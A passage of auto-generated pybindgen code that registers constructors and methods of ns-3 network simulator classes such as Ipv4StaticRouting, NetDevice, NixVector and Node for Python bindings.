cls.add_method('RouteInput', 'bool', [param('ns3::Ptr< ns3::Packet const >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice const >', 'idev'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4Route >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ucb'), param('ns3::Callback< void, ns3::Ptr< ns3::Ipv4MulticastRoute >, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'mcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'lcb'), param('ns3::Callback< void, ns3::Ptr< ns3::Packet const >, ns3::Ipv4Header const &, ns3::Socket::SocketErrno, 
ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'ecb')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): ns3::Ptr<ns3::Ipv4Route> ns3::Ipv4StaticRouting::RouteOutput(ns3::Ptr<ns3::Packet> p, ns3::Ipv4Header const & header, ns3::Ptr<ns3::NetDevice> oif, ns3::Socket::SocketErrno & sockerr) [member function] cls.add_method('RouteOutput', 'ns3::Ptr< ns3::Ipv4Route >', [param('ns3::Ptr< ns3::Packet >', 'p'), param('ns3::Ipv4Header const &', 'header'), param('ns3::Ptr< ns3::NetDevice >', 'oif'), param('ns3::Socket::SocketErrno &', 'sockerr')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::SetDefaultMulticastRoute(uint32_t outputInterface) [member function] cls.add_method('SetDefaultMulticastRoute', 'void', [param('uint32_t', 'outputInterface')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::SetDefaultRoute(ns3::Ipv4Address nextHop, uint32_t interface, uint32_t metric=0) [member function] cls.add_method('SetDefaultRoute', 'void', [param('ns3::Ipv4Address', 'nextHop'), param('uint32_t', 'interface'), param('uint32_t', 'metric', default_value='0')]) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::SetIpv4(ns3::Ptr<ns3::Ipv4> ipv4) [member function] cls.add_method('SetIpv4', 'void', [param('ns3::Ptr< ns3::Ipv4 >', 'ipv4')], is_virtual=True) ## ipv4-static-routing.h (module 'internet'): void ns3::Ipv4StaticRouting::DoDispose() [member function] cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True) return def register_Ns3Ipv6AddressChecker_methods(root_module, cls): ## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker(ns3::Ipv6AddressChecker const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv6AddressChecker const &', 'arg0')]) return def 
register_Ns3Ipv6AddressValue_methods(root_module, cls): ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue() [constructor] cls.add_constructor([]) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6AddressValue const & arg0) [copy constructor] cls.add_constructor([param('ns3::Ipv6AddressValue const &', 'arg0')]) ## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6Address const & value) [constructor] cls.add_constructor([param('ns3::Ipv6Address const &', 'value')]) ## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6AddressValue::Copy() const [member function] cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True) ## ipv6-address.h (module 'network'): bool ns3::Ipv6AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function] cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True) ## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6AddressValue::Get() const [member function] cls.add_method('Get', 'ns3::Ipv6Address', [], is_const=True) ## ipv6-address.h (module 'network'): std::string ns3::Ipv6AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function] cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True) ## ipv6-address.h (module 'network'): void ns3::Ipv6AddressValue::Set(ns3::Ipv6Address const & value) [member function] cls.add_method('Set', 'void', [param('ns3::Ipv6Address const &', 'value')]) return def register_Ns3Ipv6PrefixChecker_methods(root_module, cls): ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker() [constructor] cls.add_constructor([]) ## ipv6-address.h 
(module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker(ns3::Ipv6PrefixChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv6PrefixChecker const &', 'arg0')])
    return

# NOTE: Everything below is pybindgen-generated registration code for the ns-3
# Python bindings.  Each register_* function attaches the constructors and
# methods of one C++ class to its pybindgen ClassWrapper (`cls`); the string
# literals (C++ type names, parameter names) must match the C++ API exactly,
# so do not edit them by hand — regenerate the bindings instead.

def register_Ns3Ipv6PrefixValue_methods(root_module, cls):
    """Register constructors and methods of ns3::Ipv6PrefixValue on *cls*."""
    ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue() [constructor]
    cls.add_constructor([])
    ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6PrefixValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv6PrefixValue const &', 'arg0')])
    ## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6Prefix const & value) [constructor]
    cls.add_constructor([param('ns3::Ipv6Prefix const &', 'value')])
    ## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6PrefixValue::Copy() const [member function]
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    ## ipv6-address.h (module 'network'): bool ns3::Ipv6PrefixValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True)
    ## ipv6-address.h (module 'network'): ns3::Ipv6Prefix ns3::Ipv6PrefixValue::Get() const [member function]
    cls.add_method('Get', 'ns3::Ipv6Prefix', [], is_const=True)
    ## ipv6-address.h (module 'network'): std::string ns3::Ipv6PrefixValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True)
    ## ipv6-address.h (module 'network'): void ns3::Ipv6PrefixValue::Set(ns3::Ipv6Prefix const & value) [member function]
    cls.add_method('Set', 'void', [param('ns3::Ipv6Prefix const &', 'value')])
    return

def register_Ns3LogNormalRandomVariable_methods(root_module, cls):
    """Register constructors and methods of ns3::LogNormalRandomVariable on *cls*."""
    ## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::LogNormalRandomVariable::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable::LogNormalRandomVariable() [constructor]
    cls.add_constructor([])
    ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetMu() const [member function]
    cls.add_method('GetMu', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetSigma() const [member function]
    cls.add_method('GetSigma', 'double', [], is_const=True)
    ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue(double mu, double sigma) [member function]
    cls.add_method('GetValue', 'double', [param('double', 'mu'), param('double', 'sigma')])
    ## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger(uint32_t mu, uint32_t sigma) [member function]
    cls.add_method('GetInteger', 'uint32_t', [param('uint32_t', 'mu'), param('uint32_t', 'sigma')])
    ## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue() [member function]
    cls.add_method('GetValue', 'double', [], is_virtual=True)
    ## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger() [member function]
    cls.add_method('GetInteger', 'uint32_t', [], is_virtual=True)
    return

def register_Ns3Mac48AddressChecker_methods(root_module, cls):
    """Register constructors of ns3::Mac48AddressChecker on *cls*."""
    ## mac48-address.h (module 'network'): ns3::Mac48AddressChecker::Mac48AddressChecker() [constructor]
    cls.add_constructor([])
    ## mac48-address.h (module 'network'): ns3::Mac48AddressChecker::Mac48AddressChecker(ns3::Mac48AddressChecker const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Mac48AddressChecker const &', 'arg0')])
    return

def register_Ns3Mac48AddressValue_methods(root_module, cls):
    """Register constructors and methods of ns3::Mac48AddressValue on *cls*."""
    ## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue() [constructor]
    cls.add_constructor([])
    ## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue(ns3::Mac48AddressValue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Mac48AddressValue const &', 'arg0')])
    ## mac48-address.h (module 'network'): ns3::Mac48AddressValue::Mac48AddressValue(ns3::Mac48Address const & value) [constructor]
    cls.add_constructor([param('ns3::Mac48Address const &', 'value')])
    ## mac48-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Mac48AddressValue::Copy() const [member function]
    cls.add_method('Copy', 'ns3::Ptr< ns3::AttributeValue >', [], is_const=True, is_virtual=True)
    ## mac48-address.h (module 'network'): bool ns3::Mac48AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
    cls.add_method('DeserializeFromString', 'bool', [param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_virtual=True)
    ## mac48-address.h (module 'network'): ns3::Mac48Address ns3::Mac48AddressValue::Get() const [member function]
    cls.add_method('Get', 'ns3::Mac48Address', [], is_const=True)
    ## mac48-address.h (module 'network'): std::string ns3::Mac48AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
    cls.add_method('SerializeToString', 'std::string', [param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')], is_const=True, is_virtual=True)
    ## mac48-address.h (module 'network'): void ns3::Mac48AddressValue::Set(ns3::Mac48Address const & value) [member function]
    cls.add_method('Set', 'void', [param('ns3::Mac48Address const &', 'value')])
    return

def register_Ns3NetDevice_methods(root_module, cls):
    """Register constructors and (mostly pure-virtual) methods of the abstract
    base class ns3::NetDevice on *cls*."""
    ## net-device.h (module 'network'): ns3::NetDevice::NetDevice() [constructor]
    cls.add_constructor([])
    ## net-device.h (module 'network'): ns3::NetDevice::NetDevice(ns3::NetDevice const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::NetDevice const &', 'arg0')])
    ## net-device.h (module 'network'): void ns3::NetDevice::AddLinkChangeCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function]
    cls.add_method('AddLinkChangeCallback', 'void', [param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')], is_pure_virtual=True, is_virtual=True)
    ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetAddress() const [member function]
    cls.add_method('GetAddress', 'ns3::Address', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetBroadcast() const [member function]
    cls.add_method('GetBroadcast', 'ns3::Address', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): ns3::Ptr<ns3::Channel> ns3::NetDevice::GetChannel() const [member function]
    cls.add_method('GetChannel', 'ns3::Ptr< ns3::Channel >', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): uint32_t ns3::NetDevice::GetIfIndex() const [member function]
    cls.add_method('GetIfIndex', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): uint16_t ns3::NetDevice::GetMtu() const [member function]
    cls.add_method('GetMtu', 'uint16_t', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function]
    cls.add_method('GetMulticast', 'ns3::Address', [param('ns3::Ipv4Address', 'multicastGroup')], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function]
    cls.add_method('GetMulticast', 'ns3::Address', [param('ns3::Ipv6Address', 'addr')], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NetDevice::GetNode() const [member function]
    cls.add_method('GetNode', 'ns3::Ptr< ns3::Node >', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): static ns3::TypeId ns3::NetDevice::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## net-device.h (module 'network'): bool ns3::NetDevice::IsBridge() const [member function]
    cls.add_method('IsBridge', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): bool ns3::NetDevice::IsBroadcast() const [member function]
    cls.add_method('IsBroadcast', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): bool ns3::NetDevice::IsLinkUp() const [member function]
    cls.add_method('IsLinkUp', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): bool ns3::NetDevice::IsMulticast() const [member function]
    cls.add_method('IsMulticast', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): bool ns3::NetDevice::IsPointToPoint() const [member function]
    cls.add_method('IsPointToPoint', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): bool ns3::NetDevice::NeedsArp() const [member function]
    cls.add_method('NeedsArp', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    ## net-device.h (module 'network'): bool ns3::NetDevice::Send(ns3::Ptr<ns3::Packet> packet, ns3::Address const & dest, uint16_t protocolNumber) [member function]
    cls.add_method('Send', 'bool', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')], is_pure_virtual=True, is_virtual=True)
    ## net-device.h (module 'network'): bool ns3::NetDevice::SendFrom(ns3::Ptr<ns3::Packet> packet, ns3::Address const & source, ns3::Address const & dest, uint16_t protocolNumber) [member function]
    cls.add_method('SendFrom', 'bool', [param('ns3::Ptr< ns3::Packet >', 'packet'), param('ns3::Address const &', 'source'), param('ns3::Address const &', 'dest'), param('uint16_t', 'protocolNumber')], is_pure_virtual=True, is_virtual=True)
    ## net-device.h (module 'network'): void ns3::NetDevice::SetAddress(ns3::Address address) [member function]
    cls.add_method('SetAddress', 'void', [param('ns3::Address', 'address')], is_pure_virtual=True, is_virtual=True)
    ## net-device.h (module 'network'): void ns3::NetDevice::SetIfIndex(uint32_t const index) [member function]
    cls.add_method('SetIfIndex', 'void', [param('uint32_t const', 'index')], is_pure_virtual=True, is_virtual=True)
    ## net-device.h (module 'network'): bool ns3::NetDevice::SetMtu(uint16_t const mtu) [member function]
    cls.add_method('SetMtu', 'bool', [param('uint16_t const', 'mtu')], is_pure_virtual=True, is_virtual=True)
    ## net-device.h (module 'network'): void ns3::NetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function]
    cls.add_method('SetNode', 'void', [param('ns3::Ptr< ns3::Node >', 'node')], is_pure_virtual=True, is_virtual=True)
    ## net-device.h (module 'network'): void ns3::NetDevice::SetPromiscReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,const ns3::Address&,ns3::NetDevice::PacketType,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
    cls.add_method('SetPromiscReceiveCallback', 'void', [param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_pure_virtual=True, is_virtual=True)
    ## net-device.h (module 'network'): void ns3::NetDevice::SetReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
    cls.add_method('SetReceiveCallback', 'void', [param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_pure_virtual=True, is_virtual=True)
    ## net-device.h (module 'network'): bool ns3::NetDevice::SupportsSendFrom() const [member function]
    cls.add_method('SupportsSendFrom', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    return

def register_Ns3NetDeviceQueue_methods(root_module, cls):
    """Register constructors and methods of ns3::NetDeviceQueue on *cls*."""
    ## net-device.h (module 'network'): ns3::NetDeviceQueue::NetDeviceQueue(ns3::NetDeviceQueue const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::NetDeviceQueue const &', 'arg0')])
    ## net-device.h (module 'network'): ns3::NetDeviceQueue::NetDeviceQueue() [constructor]
    cls.add_constructor([])
    ## net-device.h (module 'network'): ns3::Ptr<ns3::QueueLimits> ns3::NetDeviceQueue::GetQueueLimits() [member function]
    cls.add_method('GetQueueLimits', 'ns3::Ptr< ns3::QueueLimits >', [])
    ## net-device.h (module 'network'): bool ns3::NetDeviceQueue::IsStopped() const [member function]
    cls.add_method('IsStopped', 'bool', [], is_const=True)
    ## net-device.h (module 'network'): void ns3::NetDeviceQueue::NotifyQueuedBytes(uint32_t bytes) [member function]
    cls.add_method('NotifyQueuedBytes', 'void', [param('uint32_t', 'bytes')])
    ## net-device.h (module 'network'): void ns3::NetDeviceQueue::NotifyTransmittedBytes(uint32_t bytes) [member function]
    cls.add_method('NotifyTransmittedBytes', 'void', [param('uint32_t', 'bytes')])
    ## net-device.h (module 'network'): void ns3::NetDeviceQueue::ResetQueueLimits() [member function]
    cls.add_method('ResetQueueLimits', 'void', [])
    ## net-device.h (module 'network'): void ns3::NetDeviceQueue::SetQueueLimits(ns3::Ptr<ns3::QueueLimits> ql) [member function]
    cls.add_method('SetQueueLimits', 'void', [param('ns3::Ptr< ns3::QueueLimits >', 'ql')])
    ## net-device.h (module 'network'): void ns3::NetDeviceQueue::SetWakeCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
    cls.add_method('SetWakeCallback', 'void', [param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')], is_virtual=True)
    ## net-device.h (module 'network'): void ns3::NetDeviceQueue::Start() [member function]
    cls.add_method('Start', 'void', [], is_virtual=True)
    ## net-device.h (module 'network'): void ns3::NetDeviceQueue::Stop() [member function]
    cls.add_method('Stop', 'void', [], is_virtual=True)
    ## net-device.h (module 'network'): void ns3::NetDeviceQueue::Wake() [member function]
    cls.add_method('Wake', 'void', [], is_virtual=True)
    return

def register_Ns3NetDeviceQueueInterface_methods(root_module, cls):
    """Register constructors and methods of ns3::NetDeviceQueueInterface on *cls*."""
    ## net-device.h (module 'network'): ns3::NetDeviceQueueInterface::NetDeviceQueueInterface(ns3::NetDeviceQueueInterface const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::NetDeviceQueueInterface const &', 'arg0')])
    ## net-device.h (module 'network'): ns3::NetDeviceQueueInterface::NetDeviceQueueInterface() [constructor]
    cls.add_constructor([])
    ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::CreateTxQueues() [member function]
    cls.add_method('CreateTxQueues', 'void', [])
    ## net-device.h (module 'network'): uint8_t ns3::NetDeviceQueueInterface::GetNTxQueues() const [member function]
    cls.add_method('GetNTxQueues', 'uint8_t', [], is_const=True)
    ## net-device.h (module 'network'): ns3::Callback<unsigned char, ns3::Ptr<ns3::QueueItem>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> ns3::NetDeviceQueueInterface::GetSelectQueueCallback() const [member function]
    cls.add_method('GetSelectQueueCallback', 'ns3::Callback< unsigned char, ns3::Ptr< ns3::QueueItem >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', [], is_const=True)
    ## net-device.h (module 'network'): ns3::Ptr<ns3::NetDeviceQueue> ns3::NetDeviceQueueInterface::GetTxQueue(uint8_t i) const [member function]
    cls.add_method('GetTxQueue', 'ns3::Ptr< ns3::NetDeviceQueue >', [param('uint8_t', 'i')], is_const=True)
    ## net-device.h (module 'network'): static ns3::TypeId ns3::NetDeviceQueueInterface::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::SetSelectQueueCallback(ns3::Callback<unsigned char, ns3::Ptr<ns3::QueueItem>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> cb) [member function]
    cls.add_method('SetSelectQueueCallback', 'void', [param('ns3::Callback< unsigned char, ns3::Ptr< ns3::QueueItem >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')])
    ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::SetTxQueuesN(uint8_t numTxQueues) [member function]
    cls.add_method('SetTxQueuesN', 'void', [param('uint8_t', 'numTxQueues')])
    ## net-device.h (module 'network'): void ns3::NetDeviceQueueInterface::DoDispose() [member function]
    cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True)
    return

def register_Ns3NixVector_methods(root_module, cls):
    """Register constructors, operators and methods of ns3::NixVector on *cls*."""
    cls.add_output_stream_operator()
    ## nix-vector.h (module 'network'): ns3::NixVector::NixVector() [constructor]
    cls.add_constructor([])
    ## nix-vector.h (module 'network'): ns3::NixVector::NixVector(ns3::NixVector const & o) [copy constructor]
    cls.add_constructor([param('ns3::NixVector const &', 'o')])
    ## nix-vector.h (module 'network'): void ns3::NixVector::AddNeighborIndex(uint32_t newBits, uint32_t numberOfBits) [member function]
    cls.add_method('AddNeighborIndex', 'void', [param('uint32_t', 'newBits'), param('uint32_t', 'numberOfBits')])
    ## nix-vector.h (module 'network'): uint32_t ns3::NixVector::BitCount(uint32_t numberOfNeighbors) const [member function]
    cls.add_method('BitCount', 'uint32_t', [param('uint32_t', 'numberOfNeighbors')], is_const=True)
    ## nix-vector.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::NixVector::Copy() const [member function]
    cls.add_method('Copy', 'ns3::Ptr< ns3::NixVector >', [], is_const=True)
    ## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Deserialize(uint32_t const * buffer, uint32_t size) [member function]
    cls.add_method('Deserialize', 'uint32_t', [param('uint32_t const *', 'buffer'), param('uint32_t', 'size')])
    ## nix-vector.h (module 'network'): uint32_t ns3::NixVector::ExtractNeighborIndex(uint32_t numberOfBits) [member function]
    cls.add_method('ExtractNeighborIndex', 'uint32_t', [param('uint32_t', 'numberOfBits')])
    ## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetRemainingBits() [member function]
    cls.add_method('GetRemainingBits', 'uint32_t', [])
    ## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True)
    ## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Serialize(uint32_t * buffer, uint32_t maxSize) const [member function]
    cls.add_method('Serialize', 'uint32_t', [param('uint32_t *', 'buffer'), param('uint32_t', 'maxSize')], is_const=True)
    return

def register_Ns3Node_methods(root_module, cls):
    """Register constructors and methods of ns3::Node on *cls*."""
    ## node.h (module 'network'): ns3::Node::Node(ns3::Node const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Node const &', 'arg0')])
    ## node.h (module 'network'): ns3::Node::Node() [constructor]
    cls.add_constructor([])
    ## node.h (module 'network'): ns3::Node::Node(uint32_t systemId) [constructor]
    cls.add_constructor([param('uint32_t', 'systemId')])
    ## node.h (module 'network'): uint32_t ns3::Node::AddApplication(ns3::Ptr<ns3::Application> application) [member function]
    cls.add_method('AddApplication', 'uint32_t', [param('ns3::Ptr< ns3::Application >', 'application')])
    ## node.h (module 'network'): uint32_t ns3::Node::AddDevice(ns3::Ptr<ns3::NetDevice> device) [member function]
    cls.add_method('AddDevice', 'uint32_t', [param('ns3::Ptr< ns3::NetDevice >', 'device')])
    ## node.h (module 'network'): static bool ns3::Node::ChecksumEnabled() [member function]
    cls.add_method('ChecksumEnabled', 'bool', [], is_static=True)
    ## node.h (module 'network'): ns3::Ptr<ns3::Application> ns3::Node::GetApplication(uint32_t index) const [member function]
    cls.add_method('GetApplication', 'ns3::Ptr< ns3::Application >', [param('uint32_t', 'index')], is_const=True)
    ## node.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Node::GetDevice(uint32_t index) const [member function]
    cls.add_method('GetDevice', 'ns3::Ptr< ns3::NetDevice >', [param('uint32_t', 'index')], is_const=True)
    ## node.h (module 'network'): uint32_t ns3::Node::GetId() const [member function]
    cls.add_method('GetId', 'uint32_t', [], is_const=True)
    ## node.h (module 'network'): ns3::Time ns3::Node::GetLocalTime() const [member function]
    cls.add_method('GetLocalTime', 'ns3::Time', [], is_const=True)
    ## node.h (module 'network'): uint32_t ns3::Node::GetNApplications() const [member function]
    cls.add_method('GetNApplications', 'uint32_t', [], is_const=True)
    ## node.h (module 'network'): uint32_t ns3::Node::GetNDevices() const [member function]
    cls.add_method('GetNDevices', 'uint32_t', [], is_const=True)
    ## node.h (module 'network'): uint32_t ns3::Node::GetSystemId() const [member function]
    cls.add_method('GetSystemId', 'uint32_t', [], is_const=True)
    ## node.h (module 'network'): static ns3::TypeId ns3::Node::GetTypeId() [member function]
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    ## node.h (module 'network'): void ns3::Node::RegisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
    cls.add_method('RegisterDeviceAdditionListener', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
    ## node.h (module 'network'): void ns3::Node::RegisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler, uint16_t protocolType, ns3::Ptr<ns3::NetDevice> device, bool promiscuous=false) [member function]
    cls.add_method('RegisterProtocolHandler', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler'), param('uint16_t', 'protocolType'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'promiscuous', default_value='false')])
    ## node.h (module 'network'): void ns3::Node::UnregisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
    cls.add_method('UnregisterDeviceAdditionListener', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
    ## node.h (module 'network'): void ns3::Node::UnregisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler) [member function]
    cls.add_method('UnregisterProtocolHandler', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler')])
